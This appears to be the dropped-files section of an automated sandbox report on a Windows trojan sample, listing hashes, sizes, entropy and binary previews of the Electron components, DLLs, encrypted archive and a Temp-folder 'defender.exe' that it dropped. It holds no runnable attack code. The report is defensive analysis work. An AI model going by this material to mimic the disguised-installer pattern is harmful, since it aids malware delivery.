                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):630964
                                                                    Entropy (8bit):4.810757945626649
                                                                    Encrypted:false
                                                                    SSDEEP:12288:H0JfhK5lIRIS151RHexYzs+DN5W9xTvvWF37sQ/k/k/i:y5V9dN5Oxjn
                                                                    MD5:C68C235D8E696C098CF66191E648196B
                                                                    SHA1:5C967FBBD90403A755D6C4B2411E359884DC8317
                                                                    SHA-256:AB96A18177AF90495E2E3C96292638A775AA75C1D210CA6A6C18FBC284CD815B
                                                                    SHA-512:34D14D8CB851DF1EA8CD3CC7E9690EAF965D8941CFCAC1C946606115AD889630156C5FF47011B27C1288F8DF70E8A7DC41909A9FA98D75B691742EC1D1A5E653
                                                                    Malicious:false
                                                                    Preview:..........?.h.d...i.u...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.$.....,.....1.....9.....A.....I.....P.....W.....^....._.....`.....b.......................#.....=.....X.............................I.....K.....O.....w...................................(.....B.....w.........................................B.....k.............................+.....D....._.....i.....y...................................Q...............................................&.....H.....l.....x.............................B.....e............................./.....O.........................................(.....H.....O.....R.....S.....].....i.......................5...........Q.....a...........1.....^................................... .....*.....N.......................O............................. .....5.....h.....}... .....".....%.....(.%...*.W...+.Z...,.x........./.....0.....1.4...3.K...4.....5.....6.$...7.L...8.z...9.....;.....<.....=.....>.!...?.2...@.S...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):370331
                                                                    Entropy (8bit):5.550902354924257
                                                                    Encrypted:false
                                                                    SSDEEP:6144:A3J7MHJrRRcAjowQx+ByxN6dn4bLXvu9M7SOVDE/xUDv6o5WI5ggbN:G7EHl9BdU5X5x
                                                                    MD5:272F8A8B517C7283EAB83BA6993EEA63
                                                                    SHA1:AD4175331B948BD4F1F323A4938863472D9B700C
                                                                    SHA-256:D15B46BC9B5E31449B11251DF19CD2BA4920C759BD6D4FA8CA93FD3361FDD968
                                                                    SHA-512:3A0930B7F228A779F727EBFB6AE8820AB5CC2C9E04C986BCE7B0F49F9BF124F349248ECDF108EDF8870F96B06D58DEA93A3E0E2F2DA90537632F2109E1AA65F0
                                                                    Malicious:false
                                                                    Preview:..........q.h.....i.....j.....k.,...l.7...n.?...o.D...p.Q...r.W...s.h...t.q...v.....w.....y.....z.....|.....}.........................................................................(.....9.....K....._.....g.....p.....................................................%.....=.....C.....S.....d.....k.....x.................................................................W.....m.....y.................................................................?.....c.......................................................................,.....4.....?.....W.....g.................................................................".....4.....E.....b.....i.....l.....m.....u.....}.............................&.....`.....g.........................................".....*.....,.....2.....D.....e.....}.............................1.....7.....A.....Q.....`.....h... .m...".w...%.....(.....*.....+.....,.........../.....0.1...1.]...3.g...4.....5.....6.....7.....8.....9.....;.....<.%...=.3...>.J...?.S...@.c...A.....C...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):388458
                                                                    Entropy (8bit):5.356168167447509
                                                                    Encrypted:false
                                                                    SSDEEP:6144:24pV6wBz58kN6vhq//3UZFBIzDWs8ADjLKrYNguA/h5aS0DwV+ChZYeeq0e1k4H5:24bVd5B/3U/BLs8kMKguA/h5N1hZY+0u
                                                                    MD5:67A443A5C2EAAD32625EDB5F8DEB7852
                                                                    SHA1:A6137841E8E7736C5EDE1D0DC0CE3A44DC41013F
                                                                    SHA-256:41DFB772AE4C6F9E879BF7B4FA776B2877A2F8740FA747031B3D6F57F34D81DD
                                                                    SHA-512:E0FDFF1C3C834D8AF8634F43C2F16BA5B883A8D88DFD322593A13830047568FAF9F41D0BF73CD59E2E33C38FA58998D4702D2B0C21666717A86945D18B3F29E5
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):987188
                                                                    Entropy (8bit):4.090571010189695
                                                                    Encrypted:false
                                                                    SSDEEP:3072:S3YCY5ynH4ASpuCkCxSiP84Gb/v5nB7zztROcA2P:SnVUdQO84Gb/v55zztROcA2P
                                                                    MD5:18EC8FF3C0701A6A8C48F341D368BAB5
                                                                    SHA1:8BFF8AEE26B990CF739A29F83EFDF883817E59D8
                                                                    SHA-256:052BCDB64A80E504BB6552B97881526795B64E0AB7EE5FC031F3EDF87160DEE9
                                                                    SHA-512:A0E997FC9D316277DE3F4773388835C287AB1A35770C01E376FB7428FF87683A425F6A6A605D38DD7904CA39C50998CD85F855CB33AE6ABAD47AC85A1584FE4E
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):916416
                                                                    Entropy (8bit):4.338166638560127
                                                                    Encrypted:false
                                                                    SSDEEP:12288:iy/yX8OsABW3p1F9SviTlwJAg5NFO1Tr/p54JAQvfEC28+58XoX0DTq9OyU+0Ak1:vu8OkDY5YMZb
                                                                    MD5:A17F16D7A038B0FA3A87D7B1B8095766
                                                                    SHA1:B2F845E52B32C513E6565248F91901AB6874E117
                                                                    SHA-256:D39716633228A5872630522306F89AF8585F8092779892087C3F1230D21A489E
                                                                    SHA-512:371FB44B20B8ABA00C4D6F17701FA4303181AD628F60C7B4218E33BE7026F118F619D66D679BFFCB0213C48700FAFD36B2E704499A362F715F63EA9A75D719E7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):771431
                                                                    Entropy (8bit):4.388714549432334
                                                                    Encrypted:false
                                                                    SSDEEP:12288:5ZY31Mkgs3s5UvfZLRflsjj8FCG1LDoAGkEeuLAD57Kle9d8nyj9FR3o09XAyFHa:57yU5K54
                                                                    MD5:A32BA63FEEED9B91F6D6800B51E5AEAE
                                                                    SHA1:2FBF6783996E8315A4FB94B7D859564350EE5918
                                                                    SHA-256:E32E37CA0AB30F1816FE6DF37E3168E1022F1D3737C94F5472AB6600D97A45F6
                                                                    SHA-512:ADEBDE0F929820D8368096A9C30961BA7B33815B0F124CA56CA05767BA6D081ADF964088CB2B9FCAA07F756B946FFFA701F0B64B07D457C99FD2B498CBD1E8A5
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):395016
                                                                    Entropy (8bit):5.625100269002306
                                                                    Encrypted:false
                                                                    SSDEEP:6144:xxl+G2KPlJi+kKD80GlTgAI7WTge95j/0+Vi1havX9vwiBrVmI:rlt2IlrRn57m5j/1
                                                                    MD5:5FF2E5C95067A339E3D6B8985156EC1F
                                                                    SHA1:7525B25C7B07F54B63B6459A0D8C8C720BD8A398
                                                                    SHA-256:14A131BA318274CF10DE533A19776DB288F08A294CF7E564B7769FD41C7F2582
                                                                    SHA-512:2414386DF8D7AB75DCBD6CA2B9AE62BA8E953DDB8CD8661A9F984EB5E573637740C7A79050B2B303AF3D5B1D4D1BB21DC658283638718FDD04FC6E5891949D1B
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):673547
                                                                    Entropy (8bit):4.9167574403691825
                                                                    Encrypted:false
                                                                    SSDEEP:12288:Yoff7plonpyOKtPXiNcnZx75kB3IjE8EmLvLNiXEJq//GW:YoffaXMd59E7
                                                                    MD5:361A0E1F665B9082A457D36209B92A25
                                                                    SHA1:3C89E1B70B51820BB6BAA64365C64DA6A9898E2F
                                                                    SHA-256:BD02966F6C6258B66EAE7FF014710925E53FE26E8254D7DB4E9147266025CC3A
                                                                    SHA-512:D4D25FC58053F8CCE4C073846706DC1ECBC0DC19308BA35501E19676F3E7ED855D7B57AE22A5637F81CEFC1AA032BF8770D0737DF1924F3504813349387C08CF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):585532
                                                                    Entropy (8bit):5.197200392190567
                                                                    Encrypted:false
                                                                    SSDEEP:12288:UA3OsGF8Pz0WEJytlkA+7Z5QzUExbW7DQQYrhu6co/9NjjFpvJK:UAe3A85oWB
                                                                    MD5:1CA4FA13BD0089D65DA7CD2376FEB4C6
                                                                    SHA1:B1BA777E635D78D1E98E43E82D0F7A3DD7E97F9C
                                                                    SHA-256:3941364D0278E2C4D686FAA4A135D16A457B4BC98C5A08E62AA12F3ADC09AA7F
                                                                    SHA-512:D0D9EB1AA029BD4C34953EE5F4B60C09CF1D4F0B21C061DB4EDE1B5EC65D7A07FC2F780ADE5CE51F2F781D272AC32257B95EEDF471F7295BA70B5BA51DB6C51D
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):466098
                                                                    Entropy (8bit):5.819101554769623
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3CwEs5kAfnzs0ACmwSxXwzIJWl+58Qagi7+URTJziV53f:3qOFfnzs0AHwSGz5A5rri7+UtliV53f
                                                                    MD5:DB0EB3183007DE5AAE10F934FFFACC59
                                                                    SHA1:E9EA7AEFFE2B3F5CF75AB78630DA342C6F8B7FD9
                                                                    SHA-256:DDABB225B671B989789E9C2CCD1B5A8F22141A7D9364D4E6EE9B8648305E7897
                                                                    SHA-512:703EFD12FCACE8172C873006161712DE1919572C58D98B11DE7834C5628444229F5143D231C41DA5B9CF729E32DE58DEE3603CB3D18C6CDD94AA9AA36FBF5DE0
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):340874
                                                                    Entropy (8bit):6.70707570391969
                                                                    Encrypted:false
                                                                    SSDEEP:6144:fmLpS8IeOL27M807pnCKjEWkE0G5xNlEPeVplD:fmLQmK2I1nCKjEjG5xNlEPe
                                                                    MD5:82326E465E3015C64CA1DB77DC6A56BC
                                                                    SHA1:E8ABE12A8DD2CC741B9637FA8F0E646043BBFE3D
                                                                    SHA-256:6655FD9DCDFAF2ABF814FFB6C524D67495AED4D923A69924C65ABEAB30BC74FB
                                                                    SHA-512:4989789C0B2439666DDA4C4F959DFFC0DDCB77595B1F817C13A95ED97619C270151597160320B3F2327A7DAFFC8B521B68878F9E5E5FB3870EB0C43619060407
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):338121
                                                                    Entropy (8bit):6.721086394879431
                                                                    Encrypted:false
                                                                    SSDEEP:6144:zQmZEIQee2hZuwv+2440f5lHz8wMCM/9ylTN:cvIpn+2440f5lHzgT/C
                                                                    MD5:2456BF42275F15E016689DA166DF9008
                                                                    SHA1:70F7DE47E585DFEA3F5597B5BBA1F436510DECD7
                                                                    SHA-256:ADF8DF051B55507E5A79FA47AE88C7F38707D02DFAC0CC4A3A7E8E17B58C6479
                                                                    SHA-512:7E622AFA15C70785AAF7C19604D281EFE0984F621D6599058C97C19D3C0379B2EE2E03B3A7EC597040A4EEE250A782D7EC55C335274DD7DB7C7CA97DDCFD378A
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5430320
                                                                    Entropy (8bit):7.995406820581218
                                                                    Encrypted:true
                                                                    SSDEEP:98304:/Zgm9tHEEIcjWbEvKfwa2sEJFz993CNh1QeHQF5qrwrw5z0uxRRrY2kuDYj9ds:RgAtkEx4EKfatyNhHwFkkrw5IcRRtkFs
                                                                    MD5:7971A016AED2FB453C87EB1B8E3F5EB2
                                                                    SHA1:92B91E352BE8209FADCF081134334DEA147E23B8
                                                                    SHA-256:9CFD5D29CDE3DE2F042E5E1DA629743A7C95C1211E1B0B001E4EEBC0F0741E06
                                                                    SHA-512:42082AC0C033655F2EDAE876425A320D96CDAEE6423B85449032C63FC0F7D30914AA3531E65428451C07912265B85F5FEE2ED0BBDB362994D3A1FA7B14186013
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16983722
                                                                    Entropy (8bit):6.717715530755017
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Q5a7U+NhCTOi8sQrZwwpxTbG9tIagImnkiold7GfbJLljZF+3J0gWuXYRM84ai:L7U+0B91gImMMxlY3Cg51F
                                                                    MD5:C98F6CB6C8BB050874CE8BA823423A65
                                                                    SHA1:92240A9A04F6E4779BE421A18D60C7F8DBD9834C
                                                                    SHA-256:09F3B0E505D2D7413A61DBA701E95E38529AA7F14A189669D338F0E27D314446
                                                                    SHA-512:BA1ABBA6A740F8974BFE4FECAA485A386289398A0437D97043F0D0B3A26E9CE3F64981DE8F2971921623A298483813A25E90F82F7D82170FE507696BE76FBC81
                                                                    Malicious:false
                                                                    Preview:.....+...+...+..{"files":{"gayy.js":{"size":119134,"integrity":{"algorithm":"SHA256","hash":"a9b81eb985eb3c84843cb11b4050e820e0eb05bd405837eb0f8d7bb12751664d","blockSize":4194304,"blocks":["a9b81eb985eb3c84843cb11b4050e820e0eb05bd405837eb0f8d7bb12751664d"]},"offset":"0"},"index.html":{"size":1176,"integrity":{"algorithm":"SHA256","hash":"409adaf0304de02b5f9f727722d0a7c25223f38ea0fe9ad6f086cab6c994f6f2","blockSize":4194304,"blocks":["409adaf0304de02b5f9f727722d0a7c25223f38ea0fe9ad6f086cab6c994f6f2"]},"offset":"119134"},"indexss.html":{"size":2355,"integrity":{"algorithm":"SHA256","hash":"a3d1f648e3378167f55cbd541949c84a938e3a31be6bba6d4cab3f802cca8cba","blockSize":4194304,"blocks":["a3d1f648e3378167f55cbd541949c84a938e3a31be6bba6d4cab3f802cca8cba"]},"offset":"120310"},"koru.ico":{"size":270398,"integrity":{"algorithm":"SHA256","hash":"6805b525d56aeef37aa16a2e7708ddaf38a5167d3722d2281beea004e203c4fe","blockSize":4194304,"blocks":["6805b525d56aeef37aa16a2e7708ddaf38a5167d3722d2281beea004e
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):107520
                                                                    Entropy (8bit):6.442687067441468
                                                                    Encrypted:false
                                                                    SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                    MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                    SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                    SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                    SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162352
                                                                    Entropy (8bit):4.860588090157433
                                                                    Encrypted:false
                                                                    SSDEEP:1536:uebVb91USSzM+uCPNgswpzHD41OzB965pUB8/DR9BgyLMRPoq/rX4JHj/kMKE0YC:uTgsED41OV965LXMj4zF2Xl9B
                                                                    MD5:8FEF5A96DBCC46887C3FF392CBDB1B48
                                                                    SHA1:ED592D75222B7828B7B7AAB97B83516F60772351
                                                                    SHA-256:4DE0F720C416776423ADD7ADA621DA95D0D188D574F08E36E822AD10D85C3ECE
                                                                    SHA-512:E52C7820C69863ECC1E3B552B7F20DA2AD5492B52CAC97502152EBFF45E7A45B00E6925679FD7477CDC79C68B081D6572EEED7AED773416D42C9200ACCC7230E
                                                                    Malicious:false
                                                                    Preview:.........4D11.0.226.20-electron.0...........................................6.. ...`.......06..a........a........a........ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.........................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):476792
                                                                    Entropy (8bit):5.595608653079527
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qqgtKzy7vqUSMd+5ZTR4ymbsLIniZiYIU+gTh3WOdvmttow2LyZDvooPmdZwmNgi:lgEzy2NTROsLftIU+gTQ4E2ro+dOmp
                                                                    MD5:A373D83D4C43BA957693AD57172A251B
                                                                    SHA1:8E0FDB714DF2F4CB058BEB46C06AA78F77E5FF86
                                                                    SHA-256:43B58CA4057CF75063D3B4A8E67AA9780D9A81D3A21F13C64B498BE8B3BA6E0C
                                                                    SHA-512:07FBD84DC3E0EC1536CCB54D5799D5ED61B962251ECE0D48E18B20B0FC9DD92DE06E93957F3EFC7D9BED88DB7794FE4F2BEC1E9B081825E41C6AC3B4F41EAB18
                                                                    Malicious:false
                                                                    Preview:.........K..11.0.226.20-electron.0..............................................`....f..8...........h...a........a........aT.......ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5209088
                                                                    Entropy (8bit):6.329767466271418
                                                                    Encrypted:false
                                                                    SSDEEP:49152:tG7ixZvPbWjIXTFy1RYQZHJvuZBiDTwgvsrt5/PXd0kpmaN+WUf4CvB25zT7RCAq:c7iDPqjvzO1Lhgf49zT7grg4
                                                                    MD5:A0845E0774702DA9550222AB1B4FDED7
                                                                    SHA1:65D5BD6C64090F0774FD0A4C9B215A868B48E19B
                                                                    SHA-256:6150A413EBE00F92F38737BDCCF493D19921EF6329FCD48E53DE9DBDE4780810
                                                                    SHA-512:4BE0CB1E3C942A1695BAE7B45D21C5F70E407132ECC65EFB5B085A50CDAB3C33C26E90BD7C86198EC40FB2B18D026474B6C649776A3CA2CA5BFF6F922DE2319B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......?..........&8...................................... Q...........`A........................................X.J.~.....J.P.....P.......N..c............P..}....J.....................h.J.(...@.?.8...........x.K.P............................text...".?.......?................. ..`.rdata..$.....?.. ....?.............@..@.data...`.....K.......K.............@....pdata...c....N..d...\M.............@..@.00cfg..(.....P.......N.............@..@.gxfg...`,... P.......N.............@..@.retplne\....PP.......N..................tls....Q....`P.......N.............@....voltbl.8....pP.......N................._RDATA........P.......N.............@..@.rsrc.........P.......N.............@..@.reloc...}....P..~....N.............@..B........................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):106
                                                                    Entropy (8bit):4.724752649036734
                                                                    Encrypted:false
                                                                    SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                    MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                    SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                    SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                    SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                    Malicious:false
                                                                    Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):920576
                                                                    Entropy (8bit):6.556557427650666
                                                                    Encrypted:false
                                                                    SSDEEP:24576:PR9nl1crwjLAQw6Z5WUDYsH56g3P0zAk7:PR1l1culw6Z5WUDYsH56g3P0zAk7
                                                                    MD5:0E4E0F481B261EA59F196E5076025F77
                                                                    SHA1:C73C1F33B5B42E9D67D819226DB69E60D2262D7B
                                                                    SHA-256:F681844896C084D2140AC210A974D8DB099138FE75EDB4DF80E233D4B287196A
                                                                    SHA-512:E6127D778EC73ACBEB182D42E5CF36C8DA76448FBDAB49971DE88EC4EB13CE63140A2A83FC3A1B116E41F87508FF546C0D7C042B8F4CDD9E07963801F3156BA2
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." .....l................................................................`A............................................<!..T...P...............pn..............<...Tn......................8m..(...@...8............................................text....k.......l.................. ..`.rdata..4............p..............@..@.data....L...P... ...6..............@....pdata..pn.......p...V..............@..@.00cfg..(...........................@..@.gxfg... (... ...*..................@..@.retplne\....P...........................tls.........`......................@....voltbl.8....p.........................._RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):12288
                                                                    Entropy (8bit):5.719859767584478
                                                                    Encrypted:false
                                                                    SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                    MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                    SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                    SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                    SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:7-zip archive data, version 0.4
                                                                    Category:dropped
                                                                    Size (bytes):69132162
                                                                    Entropy (8bit):7.999993610504196
                                                                    Encrypted:true
                                                                    SSDEEP:1572864:irziNx5qUJsrnLn3ttl5lWSehqFfIxi+blIowRjnMUlS/tfp:lx5qUJsrL3t5lWTjigwRjnBQ/9p
                                                                    MD5:8B5C4BA64B5771A2FB1C02CE06071D83
                                                                    SHA1:88973593B1602DB7EEBF40C912D97022E7D6DEFC
                                                                    SHA-256:16E71D87B581E3C798224DB66907ECD20A72832E5373D604A3AF9EAA1EFE2AA8
                                                                    SHA-512:E9990E600638414D0F5DF2B3CA668DB5957E56CBF1C3AFAC80DBAB7A9C80D1F186293BB3FFD500000303EEAEDC0707AF9CD34FA2FD65B5461B5188706BD5F0B6
                                                                    Malicious:false
                                                                     Preview:
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):434176
                                                                    Entropy (8bit):6.584811966667578
                                                                    Encrypted:false
                                                                    SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                    MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                    SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                    SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                    SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.6a..X2..X2..X2m.[3..X2m.]3..X2Z.]3+.X2Z.\3..X2Z.[3..X2m.\3..X2m.Y3..X2..Y2..X2..\3#.X2..]3..X2..X3..X2...2..X2...2..X2..Z3..X2Rich..X2........PE..L.....\...........!......................... ...............................@............@..........................6.......7..d................................E.....................................@............ ...............................text............................... ..`.rdata..8"... ...$..................@..@.data........P... ...6..............@....rsrc................V..............@..@.reloc...E.......F...Z..............@..B........................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
